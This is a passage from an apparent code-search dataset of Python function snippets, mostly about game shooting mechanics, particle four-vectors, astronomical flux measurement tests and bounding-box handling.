math.cos(theta)\n m = self.mass()\n e = math.sqrt( p**2 + m**2 )\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def start_shoot(self):\n shooter_state = String()\n shooter_state.data = \"shoot\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Shooting\")", "def boltshoot(self):\n if self.input.is_key_down('spacebar'):\n self.getWave().boltInit()", "def burn_step(self):\n change = np.full((self.width, self.height), 0)\n for x in range(0, self.width - 1):\n for y in range(0, self.height - 1):\n # How fast we go through the fuel\n if random.randrange(2) == 0:\n self.fire_check_point(x, y, change)\n\n self.temp = np.maximum(change, self.temp)", "def ballchange(self):\r\n self.picture+=1\r\n self.image=pong2.bballs[self.picture]\r\n if self.image==pong2.zeus:\r\n wow=games.Message(value=\"YOU NEED TO GET A LIFE!!!\", size=75, color=color.white, left=5, top=5, lifetime=10*games.screen.fps, after_death=None, is_collideable=False)\r\n games.screen.add(wow)", "def shoot(self):\n e = self.energy()\n m = self.mass()\n p = math.sqrt( e**2 - m**2 )\n theta = self.theta()\n pz = p * math.cos(theta)\n pt = p * math.sin(theta)\n phi = self.phi()\n px = pt * math.cos(phi)\n py = pt * math.sin(phi)\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def shoot_boolet(self):\n angle = self.angle\n for i in range(3):\n bullet = BulletAlienDos(self.main_game, shooter=self.shooter)\n bullet.vector[0] = 0\n bullet.vector[1] = 1\n bullet.normalized_vector = bullet.vector.normalize()\n bullet.normalized_vector = bullet.normalized_vector.rotate(angle)\n angle -= self.angle\n self.main_game.alien_bullets.add(bullet)", "def shoot(self):\n return self.bot_client.send_command(_Command.Shoot)", "def __call__(self):\n return self.shoot()", "def test_fluxes(self):\n\n t, x_n, x_p, r_n, r_p = (\n self.t,\n self.x_n,\n self.x_p,\n self.r_n_edge,\n self.r_p_edge,\n )\n if self.model.options[\"particle\"] == \"uniform profile\":\n # Fluxes are zero everywhere since the concentration is uniform\n np.testing.assert_array_almost_equal(self.N_s_n(t, x_n, r_n), 0)\n np.testing.assert_array_almost_equal(self.N_s_p(t, x_p, r_p), 0)\n else:\n if self.operating_condition == \"discharge\":\n if self.model.options[\"particle\"] == \"quartic profile\":\n # quartic profile has a transient at the beginning where\n # the concentration \"rearranges\" giving flux of the opposite\n # sign, so ignore first three times\n np.testing.assert_array_less(0, self.N_s_n(t[3:], x_n, r_n[1:]))\n np.testing.assert_array_less(self.N_s_p(t[3:], x_p, r_p[1:]), 0)\n else:\n np.testing.assert_array_less(\n -1e-16, self.N_s_n(t[1:], x_n, r_n[1:])\n )\n np.testing.assert_array_less(self.N_s_p(t[1:], x_p, r_p[1:]), 1e-16)\n if self.operating_condition == \"charge\":\n np.testing.assert_array_less(self.N_s_n(t[1:], x_n, r_n[1:]), 1e-16)\n np.testing.assert_array_less(-1e-16, self.N_s_p(t[1:], x_p, r_p[1:]))\n if self.operating_condition == \"off\":\n np.testing.assert_array_almost_equal(self.N_s_n(t, x_n, r_n), 0)\n np.testing.assert_array_almost_equal(self.N_s_p(t, x_p, r_p), 0)\n\n np.testing.assert_array_almost_equal(0, self.N_s_n(t, x_n, r_n[0]), decimal=4)\n np.testing.assert_array_almost_equal(0, self.N_s_p(t, x_p, r_p[0]), decimal=4)", "def shoot(self):\n theta = self.theta()\n pt = self.pt()\n p = pt / math.sin(theta)\n phi = self.phi()\n px = pt * math.cos(phi)\n py = pt * math.sin(phi)\n pz = p * math.cos(theta)\n m = self.mass()\n e = math.sqrt( p**2 + m**2 )\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def shoot(self):\n if self.cool_down_counter == 0 and self.specialfire_state == False:\n BULLET_SOUND.play()\n bullet = Bullet(self.x+10, self.y, self.bullet_img)\n self.bullets.append(bullet)\n self.cool_down_counter = 1", "def bomb_vector(self):\n\n\t\tif self.b_offset == 0:\n\t\t\top = sin\n\t\telse:\n\t\t\top = cos\n\n\t\tself.y -= self.speed\n\t\tself.rect.y = self.y\n\t\t# MMMMMMMMMMMMMMMMMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATHS\n\t\tself.x = int((self.g_settings.screen_height/2) + self.amplitude*op(self.frequency*((float(self.y)/self.g_settings.screen_width)*(2*pi) + (self.speed*time()))))\n\t\tif self.b_offset == 0:\n\t\t\tself.rect.x = self.x + self.position_x - 16\n\t\telif self.b_offset == 1:\n\t\t\tself.rect.x = self.x + self.position_x + 16\n\t\tself.screen.blit(self.image, self.rect)", "def check_ball_on_target():\n\n pass", "def shoot(self):\n shots = Shooting(self.rect.centerx, self.rect.bottom)\n # Adding the shots to sprite lists created\n all_sprites_list.add(shots)\n shooting_list.add(shots)", "def shoot(self):\n if self.direction == 'left':\n self.__temp_bullet = Bullet(self.position, 60)\n elif self.direction == 'forward':\n self.__temp_bullet = Bullet(self.position, 90)\n else:\n self.__temp_bullet = Bullet(self.position, 120)\n global game\n game.sprites.add(self.__temp_bullet)\n game.bullets.add(self.__temp_bullet)\n game.fuel_bar.modify(-1)\n sounds['phaser'].play()", "def shoot(self):\r\n bullet = Bullet(self.rect.centerx, self.rect.top)\r\n ammo.add(bullet)", "def modify_box_coordinates(self, image, poles_detected):\n for window, poles in poles_detected.items():\n # Let's consider all poles detected on an image and modify their coordinates.\n # If only one pole's been detected, just widen the box 60% both sides\n if len(poles) == 1:\n new_left_boundary = int(poles[0].BB_left * 0.4)\n new_right_boundary = int(poles[0].BB_right * 1.6) if int(poles[0].BB_right * 1.6) <\\\n image.shape[1] else (image.shape[1] - 2)\n # Move upper border way up, often when a pole is close up many components do not get\n # included in the box, as a result they do not get found\n new_top_boundary = int(poles[0].BB_top * 0.1)\n new_bot_boundary = int(poles[0].BB_bottom * 1.1) if int(poles[0].BB_bottom * 1.1) <\\\n image.shape[0] else (image.shape[0] - 2)\n\n poles[0].update_object_coordinates(left=new_left_boundary,\n top=new_top_boundary,\n right=new_right_boundary,\n bottom=new_bot_boundary)\n else:\n for pole in poles:\n # If we've got 1+ poles on one frame or image, hence the shot was likely taken from\n # further distance.\n\n # TO DO: Overlapping check here. If BBs overlap and a component happens to be in between,\n # it will be detected twice\n\n new_left_boundary = int(pole.BB_left * 0.9)\n new_right_boundary = int(pole.BB_right * 1.1) if int(pole.BB_right * 1.1) < \\\n image.shape[1] else (image.shape[1] - 2)\n new_top_boundary = int(pole.BB_top * 0.5)\n new_bot_boundary = int(pole.BB_bottom * 1.1) if int(pole.BB_bottom * 1.1) < \\\n image.shape[0] else (image.shape[0] - 2)\n\n pole.update_object_coordinates(left=new_left_boundary,\n top=new_top_boundary,\n right=new_right_boundary,\n bottom=new_bot_boundary)", "def computeAndInsertBox(self,**kwargs):\n if self.predefined_box is None:\n self.mm.neglect()\n return\n (pose,new_frame) = self.baxter.frame.computeTransformation() \n if pose is None:\n self.mm.neglect()\n return\n \n try:\n side = kwargs['side']\n except Exception,e:\n rospy.logerr(\"%s\"%str(e))\n self.mm.neglect()\n return\n else:\n self.baxter.frame.setTF(self.predefined_box+'_'+side,pose)\n self.baxter.frame.waitUntilFrameUpdate(self.predefined_box+\"_\"+side)\n self.baxter.scene.createPredefinedBox(self.predefined_box+\"_\"+side,self.predefined_box)\n if self.learning:\n self.appendToTask(\"import tf_helper \\n\")\n self.appendToTask(\"side='%s'\\n\"%(side))\n self.appendToTask(\"baxter.bb.predefined_box='%s'\\n\"%(self.predefined_box))\n self.appendToTask(\"pose = tf_helper.PS('%s',%s,%s)\\n\"%(FRAME_ORIGIN,list(pose.pose.position),list(pose.pose.orientation)))\n self.appendToTask(\"baxter.frame.setTF('%s_'+side,pose)\\n\"%(self.predefined_box))\n self.appendToTask(\"baxter.frame.waitUntilFrameUpdate('%s_'+side)\\n\"%(self.predefined_box))\n self.appendToTask(\"baxter.scene.createPredefinedBox(baxter.bb.predefined_box+'_'+side,baxter.bb.predefined_box)\\n\")\n if self.predefined_box == \"wako\" or self.predefined_box.startswith(\"tray\") is True or self.predefined_box.startswith(\"table\") is True:\n self.appendToTask(\"for drop_off in baxter.scene.boxes[baxter.bb.predefined_box][1].keys():\\n\"%())\n self.appendToTask(\" pose = tf_helper.PS('%s_'+side,%s,%s)\\n\"%(self.predefined_box,\"baxter.scene.boxes[baxter.bb.predefined_box][1][drop_off][0:3]\",\"baxter.scene.boxes[baxter.bb.predefined_box][1][drop_off][3:7]\"))\n self.appendToTask(\" baxter.frame.setTF(drop_off+'_'+side,pose)\\n\")\n if self.predefined_box == \"wako\" or self.predefined_box.startswith(\"tray\") is True or self.predefined_box.startswith(\"table\") is True:\n for drop_off in self.baxter.scene.boxes[self.predefined_box][1].keys():\n pose = PS(self.predefined_box+'_'+side,self.baxter.scene.boxes[self.predefined_box][1][drop_off][0:3],self.baxter.scene.boxes[self.predefined_box][1][drop_off][3:7])\n self.baxter.frame.setTF(drop_off+'_'+side,pose)\n self.mm.confirm()", "def bfm_shoot_movement(self):\n\n # Move the feed motor forward, wait for it to get caught into the flywheels, then come back\n # Currently waiting 1.1 seconds each direction of the bfm movement\n # 2.2 seconds total\n # So wait (ROF-2.2)/2 in each direction and hope that the LAX ball has fallen by then\n\n if self.drill_name is not None:\n time.sleep((self.rof-2.2)/2)\n self.bfm.move_forward()\n self.bfm.move_backward()\n if self.drill_name is not None:\n time.sleep((self.rof-2.2)/2)", "def test_photon_flux_conversion(self):\n init_wl = np.linspace(300, 500, num=10)\n init_spec = np.ones(init_wl.shape)\n\n test_spec_base = Spectrum(init_wl, init_spec, 'nm', is_photon_flux=False)\n spectrum = test_spec_base.get_spectrum('nm', to_photon_flux=True)\n\n expect_spec = init_spec / (sc.h * sc.c / (init_wl*1e-9))\n\n assert np.all(np.isclose(spectrum[1, :], expect_spec))", "def test_empty_img():\n assert detected_boxes[-1] == ground_truth_boxes[-1]", "def testPeakLikelihoodFlux(self):\n # make mp: a flux measurer\n measControl = measAlg.PeakLikelihoodFluxControl()\n schema = afwTable.SourceTable.makeMinimalSchema()\n mp = measAlg.MeasureSourcesBuilder().addAlgorithm(measControl).build(schema)\n \n # make and measure a series of exposures containing just one star, approximately centered\n bbox = afwGeom.Box2I(afwGeom.Point2I(0, 0), afwGeom.Extent2I(100, 101))\n kernelWidth = 35\n var = 100\n fwhm = 3.0\n sigma = fwhm/FwhmPerSigma\n convolutionControl = afwMath.ConvolutionControl()\n psf = measAlg.SingleGaussianPsf(kernelWidth, kernelWidth, sigma)\n psfKernel = psf.getLocalKernel()\n psfImage = psf.computeKernelImage()\n sumPsfSq = numpy.sum(psfImage.getArray()**2)\n psfSqArr = psfImage.getArray()**2\n for flux in (1000, 10000):\n ctrInd = afwGeom.Point2I(50, 51)\n ctrPos = afwGeom.Point2D(ctrInd)\n\n kernelBBox = psfImage.getBBox(afwImage.PARENT)\n kernelBBox.shift(afwGeom.Extent2I(ctrInd))\n\n # compute predicted flux error\n unshMImage = makeFakeImage(bbox, [ctrPos], [flux], fwhm, var)\n\n # filter image by PSF\n unshFiltMImage = afwImage.MaskedImageF(unshMImage.getBBox(afwImage.PARENT))\n afwMath.convolve(unshFiltMImage, unshMImage, psfKernel, convolutionControl)\n \n # compute predicted flux = value of image at peak / sum(PSF^2)\n # this is a sanity check of the algorithm, as much as anything\n predFlux = unshFiltMImage.getImage().get(ctrInd[0], ctrInd[1]) / sumPsfSq\n self.assertLess(abs(flux - predFlux), flux * 0.01)\n \n # compute predicted flux error based on filtered pixels\n # = sqrt(value of filtered variance at peak / sum(PSF^2)^2)\n predFluxErr = math.sqrt(unshFiltMImage.getVariance().get(ctrInd[0], ctrInd[1])) / sumPsfSq\n\n # compute predicted flux error based on unfiltered pixels\n # = sqrt(sum(unfiltered variance * PSF^2)) / sum(PSF^2)\n # and compare to that derived from filtered pixels;\n # again, this is a test of the algorithm\n varView = afwImage.ImageF(unshMImage.getVariance(), kernelBBox)\n varArr = varView.getArray()\n unfiltPredFluxErr = math.sqrt(numpy.sum(varArr*psfSqArr)) / sumPsfSq\n self.assertLess(abs(unfiltPredFluxErr - predFluxErr), predFluxErr * 0.01)\n \n for fracOffset in (afwGeom.Extent2D(0, 0), afwGeom.Extent2D(0.2, -0.3)):\n adjCenter = ctrPos + fracOffset\n if fracOffset == (0, 0):\n maskedImage = unshMImage\n filteredImage = unshFiltMImage\n else:\n maskedImage = makeFakeImage(bbox, [adjCenter], [flux], fwhm, var)\n # filter image by PSF\n filteredImage = afwImage.MaskedImageF(maskedImage.getBBox(afwImage.PARENT))\n afwMath.convolve(filteredImage, maskedImage, psfKernel, convolutionControl)\n\n exposure = afwImage.makeExposure(filteredImage)\n exposure.setPsf(psf)\n \n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n mp.apply(source, exposure, afwGeom.Point2D(*adjCenter))\n measFlux = source.get(measControl.name)\n measFluxErr = source.get(measControl.name + \".err\")\n self.assertFalse(source.get(measControl.name + \".flags\"))\n self.assertLess(abs(measFlux - flux), flux * 0.003)\n \n self.assertLess(abs(measFluxErr - predFluxErr), predFluxErr * 0.2)\n\n # try nearby points and verify that the flux is smaller;\n # this checks that the sub-pixel shift is performed in the correct direction\n for dx in (-0.2, 0, 0.2):\n for dy in (-0.2, 0, 0.2):\n if dx == dy == 0:\n continue\n offsetCtr = afwGeom.Point2D(adjCenter[0] + dx, adjCenter[1] + dy)\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n mp.apply(source, exposure, offsetCtr)\n offsetFlux = source.get(measControl.name)\n self.assertLess(offsetFlux, measFlux)\n \n # source so near edge of image that PSF does not overlap exposure should result in failure\n \n for edgePos in (\n (1, 50),\n (50, 1),\n (50, bbox.getHeight() - 1),\n (bbox.getWidth() - 1, 50),\n ):\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n mp.apply(source, exposure, afwGeom.Point2D(*edgePos))\n self.assertTrue(source.get(measControl.name + \".flags\"))\n \n # no PSF should result in failure: flags set\n noPsfExposure = afwImage.ExposureF(filteredImage)\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n mp.apply(source, noPsfExposure, afwGeom.Point2D(*adjCenter))\n self.assertTrue(source.get(measControl.name + \".flags\"))", "def shoot(state, power):\n return kickAt(state, state.opp_goal, power)", "def shooting(agent):\n ball = agent.info.ball\n car = agent.info.my_car\n our_goal = agent.my_goal.center\n target = shooting_target(agent)\n agent.drive.target = target\n distance = distance_2d(car.location, target)\n vf = velocity_forward(car)\n dodge_overshoot = distance < (abs(vf) + 500) * 1.4\n #agent.drive.speed = get_speed(agent, target)\n agent.drive.speed = 2200\n agent.drive.step(agent.info.time_delta)\n agent.controls = agent.drive.controls\n if agent.defending:\n agent.step = Step.Defending\n elif should_dodge(agent):\n agent.step = Step.Dodge\n agent.dodge = Dodge(car)\n agent.dodge.duration = 0.1\n agent.dodge.target = ball.location\n elif agent.ball_bouncing and not (abs(ball.velocity[2]) < 100\n and sign(agent.team) * ball.velocity[1] < 0) and get_bounce(agent) is not None:\n agent.step = Step.Catching\n agent.drive.target = ball.location\n agent.drive.speed = 1399\n elif vf < -900 and (not dodge_overshoot or distance < 600):\n agent.step = Step.HalfFlip\n agent.halfflip = HalfFlip(car)\n elif not dodge_overshoot and car.location[2] < 80 and\\\n (agent.drive.speed > abs(vf) + 300 and 1200 < abs(vf) < 2000 and car.boost <= 15):\n # Dodge towards the target for speed\n agent.step = Step.Dodge\n agent.dodge = Dodge(car)\n agent.dodge.duration = 0.1\n agent.dodge.target = target", "def test_boxnet(self):\n\t\timg = np.random.rand(2, 3, 256, 128)\n\t\t\n\t\tvgg = VGGNet()\n\t\tboxnet = BoxNet()\n\n\t\tfm = vgg(img)\n\t\tboxes = boxnet(fm)\n\n\t\tnp.testing.assert_equal(boxes.shape, (2,6,256/2**4,128/2**4))\n\n\t\t\"\"\" Dimension check with random shifts \"\"\"\n\n\t\t\"\"\" Visualize boxes with random shifts \"\"\"", "def shootProjectile(configuration):\n leftData, rightData = getArrowData(configuration)\n return leftData[0] > 0 or rightData[0] > 0", "def boxer(imgfile, parttree, outstack, boxsize):\n imgarray = mrc.read(imgfile)\n boxedparticles = boxerMemory(imgarray, parttree, boxsize)\n apImagicFile.writeImagic(boxedparticles, outstack)\n return True", "def spinUpBatter(self):\n self.setVelocity(config.batterShootSpeed)", "def interaction_box(self) -> None:\n assert(0 <= self.target.x_obj+self.d_x <= self.grid.width and 0 <=\n self.target.y_obj+self.d_y <= self.grid.height)\n x_beyond_target = self.target.x_obj + self.d_x\n y_beyond_target = self.target.y_obj + self.d_y\n beyond_target = self.grid.obj_list[ # Object on which we could push the box\n x_beyond_target, y_beyond_target]\n if isinstance(beyond_target, ob.Void): # Simply pushing the box\n self.grid.obj_list.swap_obj(beyond_target, self.target)\n self.grid.obj_list.swap_obj(beyond_target, self.moving_character)\n elif isinstance(beyond_target, ob.Hole):\n if beyond_target.depth == 1:\n # Destroying box and hole\n void1 = ob.Void(self.target.x_obj, self.target.y_obj)\n void2 = ob.Void(x_beyond_target, y_beyond_target)\n self.grid.obj_list[self.target] = void1\n self.grid.obj_list[beyond_target] = void2\n # Then moving character\n self.grid.obj_list.swap_obj(void1, self.moving_character)\n else:\n # Reducing depth of the hole\n beyond_target.reduce_depth()\n # Destructing the box\n void = ob.Void(self.target.x_obj, self.target.y_obj)\n self.grid.obj_list[self.target] = void", "def execute(self, cast):\n ball = cast[\"ball\"][0] # there's only one\n paddle = cast[\"paddle\"][0] # there's only one\n bricks = cast[\"brick\"]\n for brick in bricks:\n if ball.get_position().equals(brick.get_position()):\n bricks.remove(brick)\n ball.set_velocity(Point.reverse_y(ball.get_velocity()))\n\n if ball.get_position().get_y() == paddle.get_position().get_y():\n if ball.get_position().get_x() >= paddle.get_position().get_x() and ball.get_position().get_x() <= (paddle.get_position().get_x() + 11):\n ball.set_velocity(Point.reverse_y(ball.get_velocity()))\n\n if ball.get_position().get_y() == 0:\n ball.set_velocity(Point.reverse_y(ball.get_velocity()))\n \n if ball.get_position().get_x() == 0 or ball.get_position().get_x() == constants.MAX_X:\n ball.set_velocity(Point.reverse_x(ball.get_velocity()))\n\n if ball.get_position().get_y() == constants.MAX_Y:\n quit()", "def main():\n # run_test_go_straight_inches()\n # run_test_turn_degrees()\n # run_test_spin_degrees()\n beep_if_blob_is_bigger_than(3000)", "def HellFire_ShotGuns(self):\n\t\tprint(self.name.title() + \" is now shotting.\")", "def shoot(self, pos_to_shoot):\n return [SHOOT, pos_to_shoot]", "def drop_boxes(self): \r\n model = loader.load_model('models/box.egg')\r\n model.set_pos(-0.5, -0.5, -0.5)\r\n model.flatten_light()\r\n shape = BulletBoxShape(LVector3(0.5, 0.5, 0.5))\r\n ahead = self.vehicleNP.get_pos() + self.vehicle.get_forward_vector()*15\r\n \r\n for i in range(6):\r\n node = BulletRigidBodyNode('Box')\r\n node.set_mass(5.0)\r\n node.add_shape(shape)\r\n node.set_deactivation_enabled(False)\r\n np = render.attach_new_node(node)\r\n np.set_pos(ahead.x, ahead.y, ahead.z + i*2)\r\n self.world.attach(node)\r\n model.copy_to(np)", "def expose_test(self):\n with self.lock:\n self.dark = 1\n self.tstart = time.time()\n self.timestamp = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime(self.tstart))\n imagesize = (self.expArea[3] - self.expArea[1],\n self.expArea[2] - self.expArea[0])\n self.data = np.ones(shape=imagesize, dtype=np.uint16)\n self.tend = time.time()", "def shooting_target(agent):\n ball = agent.info.ball\n car = agent.info.my_car\n car_to_ball = ball.location - car.location\n backline_intersect = line_backline_intersect(\n agent.their_goal.center[1], vec2(car.location), vec2(car_to_ball))\n if abs(backline_intersect) < 700:\n goal_to_ball = normalize(car.location - ball.location)\n error = 0\n else:\n # Right of the ball\n if -500 > backline_intersect:\n target = agent.their_goal.corners[3] + vec3(400, 0, 0)\n # Left of the ball\n elif backline_intersect > 500:\n target = agent.their_goal.corners[2] - vec3(400, 0, 0)\n goal_to_ball = normalize(ball.location - target)\n # Subtract the goal to car vector\n difference = goal_to_ball - normalize(car.location - target)\n error = cap(abs(difference[0]) + abs(difference[1]), 0, 5)\n\n goal_to_ball_2d = vec2(goal_to_ball[0], goal_to_ball[1])\n test_vector_2d = dot(rotation(0.5 * math.pi), goal_to_ball_2d)\n test_vector = vec3(test_vector_2d[0], test_vector_2d[1], 0)\n\n distance = cap((40 + distance_2d(ball.location, car.location) * (error ** 2)) / 1.8, 0, 4000)\n location = ball.location + vec3((goal_to_ball[0] * distance), goal_to_ball[1] * distance, 0)\n\n # this adjusts the target based on the ball velocity perpendicular\n # to the direction we're trying to hit it\n multiplier = cap(distance_2d(car.location, location) / 1500, 0, 2)\n distance_modifier = cap(dot(test_vector, ball.velocity) * multiplier, -1000, 1000)\n location += vec3(\n test_vector[0] * distance_modifier, test_vector[1] * distance_modifier, 0)\n\n # another target adjustment that applies if the ball is close to the wall\n extra = 3850 - abs(location[0])\n if extra < 0:\n location[0] = cap(location[0], -3850, 3850)\n location[1] = location[1] + (-sign(agent.team) * cap(extra, -800, 800))\n return location", "def testEllipticalGaussian(self):\n\n width, height = 200, 200\n xcen, ycen = 0.5*width, 0.5*height\n #\n # Make the object\n #\n gal = afwImage.ImageF(afwGeom.ExtentI(width, height))\n a, b, theta = float(10), float(5), 20\n flux = 1e4\n I0 = flux/(2*math.pi*a*b)\n\n c, s = math.cos(math.radians(theta)), math.sin(math.radians(theta))\n for y in range(height):\n for x in range(width):\n dx, dy = x - xcen, y - ycen\n u = c*dx + s*dy\n v = -s*dx + c*dy\n val = I0*math.exp(-0.5*((u/a)**2 + (v/b)**2))\n if val < 0:\n val = 0\n gal.set(x, y, val)\n\n objImg = afwImage.makeExposure(afwImage.makeMaskedImage(gal))\n objImg.getMaskedImage().getVariance().set(1.0)\n del gal\n objImg.setXY0(afwGeom.Point2I(1234, 5678))\n #\n # We need a PSF to be able to centroid well. Cf. #2540\n #\n FWHM = 5\n ksize = 25 # size of desired kernel\n objImg.setPsf(measAlg.DoubleGaussianPsf(ksize, ksize,\n FWHM/(2*math.sqrt(2*math.log(2))), 1, 0.1))\n \n\n if display:\n frame = 0\n ds9.mtv(objImg, frame=frame, title=\"Elliptical\")\n\n self.assertAlmostEqual(1.0, afwMath.makeStatistics(objImg.getMaskedImage().getImage(),\n afwMath.SUM).getValue()/flux)\n #\n # Test elliptical apertures\n #\n #\n msConfig = measAlg.SourceMeasurementConfig()\n msConfig.algorithms.names.add(\"flux.aperture.elliptical\")\n radii = math.sqrt(a*b)*numpy.array([0.45, 1.0, 2.0, 3.0, 10.0,])\n\n msConfig.algorithms[\"flux.aperture.elliptical\"].radii = radii\n schema = afwTable.SourceTable.makeMinimalSchema()\n ms = msConfig.makeMeasureSources(schema)\n \n table = afwTable.SourceTable.make(schema)\n msConfig.slots.setupTable(table)\n source = table.makeRecord()\n\n ss = afwDetection.FootprintSet(objImg.getMaskedImage(), afwDetection.Threshold(0.1))\n fp = ss.getFootprints()[0]\n source.setFootprint(fp)\n\n center = fp.getPeaks()[0].getF()\n ms.apply(source, objImg, center)\n\n self.assertEqual(source.get(\"flux.aperture.elliptical.nProfile\"), len(radii))\n\n r0 = 0.0\n if display:\n shape = source.getShape().clone()\n xy = afwGeom.ExtentD(source.getCentroid()) - afwGeom.ExtentD(objImg.getXY0())\n ds9.dot(\"x\", xcen, ycen, ctype=ds9.RED)\n ds9.dot(\"+\", *xy, frame=frame)\n with ds9.Buffering():\n for r, apFlux in zip(radii, source.get(\"flux.aperture.elliptical\")):\n if display: # draw the inner and outer boundaries of the aperture\n shape.scale(r/shape.getDeterminantRadius())\n ds9.dot(shape, *xy, frame=frame)\n\n trueFlux = flux*(math.exp(-r0**2/(2*a*b)) - math.exp(-r**2/(2*a*b)))\n if verbose:\n print \"%5.2f %6.3f%%\" % (r, 100*((trueFlux - apFlux)/flux))\n self.assertAlmostEqual(trueFlux/flux, apFlux/flux, 5)\n r0 = r\n #\n # Now measure some annuli \"by hand\" (we'll repeat this will EllipticalAperture algorithm soon)\n #\n\n for r1, r2 in [(0.0, 0.45*a),\n (0.45*a, 1.0*a),\n ( 1.0*a, 2.0*a),\n ( 2.0*a, 3.0*a),\n ( 3.0*a, 5.0*a),\n ( 3.0*a, 10.0*a),\n ]:\n control = measAlg.SincFluxControl()\n control.radius1 = r1\n control.radius2 = r2\n control.angle = math.radians(theta)\n control.ellipticity = 1 - b/a\n\n schema = afwTable.SourceTable.makeMinimalSchema()\n mp = measAlg.MeasureSourcesBuilder().addAlgorithm(control).build(schema)\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n\n if display: # draw the inner and outer boundaries of the aperture\n Mxx = 1\n Myy = (b/a)**2\n\n mxx, mxy, myy = c**2*Mxx + s**2*Myy, c*s*(Mxx - Myy), s**2*Mxx + c**2*Myy\n for r in (r1, r2):\n ds9.dot(\"@:%g,%g,%g\" % (r**2*mxx, r**2*mxy, r**2*myy), xcen, ycen, frame=frame)\n\n mp.apply(source, objImg, center)\n\n self.assertAlmostEqual(math.exp(-0.5*(r1/a)**2) - math.exp(-0.5*(r2/a)**2),\n source.get(control.name)/flux, 5)\n\n control = measAlg.GaussianFluxControl()\n\n schema = afwTable.SourceTable.makeMinimalSchema()\n mp = measAlg.MeasureSourcesBuilder().addAlgorithm(control).build(schema)\n table = afwTable.SourceTable.make(schema)\n source = table.makeRecord()\n\n objImg.setPsf(None) # no Psf\n mp.apply(source, objImg, center)\n # we haven't provided a PSF, so the built-in aperture correction won't work...but we'll get\n # a result anyway\n # Note that flags.psffactor==True sets flags=True IFF we attempt aperture corrections\n self.assertEqual(source.get(control.name + \".flags\"), False)\n self.assertEqual(source.get(control.name + \".flags.psffactor\"), True)\n gflux = source.get(control.name)\n err = gflux/flux - 1\n if abs(err) > 1.5e-5:\n self.assertEqual(gflux, flux, (\"%g, %g: error is %g\" % (gflux, flux, err)))", "def simple_test_vot(self, img, frame_id, gt_bboxes, img_metas=None):\n if frame_id == 0:\n self.init_frame_id = 0\n if self.init_frame_id == frame_id:\n # initialization\n gt_bboxes = gt_bboxes[0][0]\n self.memo = Dict()\n self.memo.bbox = quad2bbox(gt_bboxes)\n self.memo.z_feat, self.memo.avg_channel = self.init(\n img, self.memo.bbox)\n # 1 denotes the initialization state\n bbox_pred = img.new_tensor([1.])\n best_score = -1.\n elif self.init_frame_id > frame_id:\n # 0 denotes unknown state, namely the skipping frame after failure\n bbox_pred = img.new_tensor([0.])\n best_score = -1.\n else:\n # normal tracking state\n best_score, self.memo.bbox = self.track(img, self.memo.bbox,\n self.memo.z_feat,\n self.memo.avg_channel)\n # convert bbox to region\n track_bbox = bbox_cxcywh_to_x1y1wh(self.memo.bbox).cpu().numpy()\n track_region = bbox2region(track_bbox)\n gt_bbox = gt_bboxes[0][0]\n if len(gt_bbox) == 4:\n gt_bbox = bbox_xyxy_to_x1y1wh(gt_bbox)\n gt_region = bbox2region(gt_bbox.cpu().numpy())\n\n if img_metas is not None and 'img_shape' in img_metas[0]:\n image_shape = img_metas[0]['img_shape']\n image_wh = (image_shape[1], image_shape[0])\n else:\n image_wh = None\n Warning('image shape are need when calculating bbox overlap')\n overlap = calculate_region_overlap(\n track_region, gt_region, bounds=image_wh)\n if overlap <= 0:\n # tracking failure\n self.init_frame_id = frame_id + 5\n # 2 denotes the failure state\n bbox_pred = img.new_tensor([2.])\n else:\n bbox_pred = bbox_cxcywh_to_xyxy(self.memo.bbox)\n\n return bbox_pred, best_score", "def test_takes_shot(self):\n player = TestPlayer()\n self.ai.take_shot(player)\n self.assertEqual(1, player.shots_taken)", "def update(self):\r\n \r\n # Desplaza el bloque un píxel hacia abajo.\r\n if self.rect.y > 500:\r\n self.rect.x = random.randrange(10,600) \r\n self.rect.y = random.randrange(-300, -20) \r\n \r\n else:\r\n self.rect.y += 5\r\n \r\n # Si el bloque estuviera muy abajo, lo restablecemos a la parte superior de la pantalla.\r", "def time_step_evolution(self):\n self.box_1.x += self.h * self.box_1.v\n self.box_2.x += self.h * self.box_2.v\n\n if self.box_collision():\n\n aux_v_1 = self.box_1.v\n aux_v_2 = self.box_2.v\n self.box_1.v =\\\n (aux_v_1 * (self.box_1.mass - self.box_2.mass) +\n 2*aux_v_2*self.box_2.mass)/(self.box_1.mass + self.box_2.mass)\n self.box_2.v =\\\n (aux_v_2 * (self.box_2.mass - self.box_1.mass) +\n 2*aux_v_1*self.box_1.mass)/(self.box_2.mass + self.box_1.mass)\n self.coll_counter += 1\n\n elif self.wall_collision():\n\n self.box_1.v = -self.box_1.v\n self.coll_counter += 1", "def test_stokes_drag():\n assert DM.stokes_drag(fluid_velocity=1.0, particle_velocity=0.0,\n diameter=1.0, rho=1.0, fluid_viscosity=1.0) == 18.0", "def bolt_check(self):\n for x in self.get_bolts():\n if x.get_velocity() > 0:\n self.set_plyrbolts(1)", "def test_qasm_simulator_single_shot(self):\n shots = 1\n self.qobj.config.shots = shots\n result = self.backend.run(self.qobj).result()\n self.assertEqual(result.success, True)", "def shoot_fire(self, camera):\n\n cursor_pos = pygame.mouse.get_pos()\n tempMouseRect = pygame.Rect(cursor_pos, (0, 0))\n tempMouseRect = camera.use_cam_rect(tempMouseRect)\n\n relPos = tempMouseRect.topleft\n\n self.intMousePos = relPos\n ang = self.get_shoot_angle(relPos)\n #ang = math.radians(170 - math.degrees(ang))\n ang = math.radians(( (math.degrees(ang)+ 180 )))\n #ang = int(ang)\n\n if self.canShoot and self.ammo: #and self.is_good_angle(ang):\n self.canShoot = False\n self.ammo -= 1\n 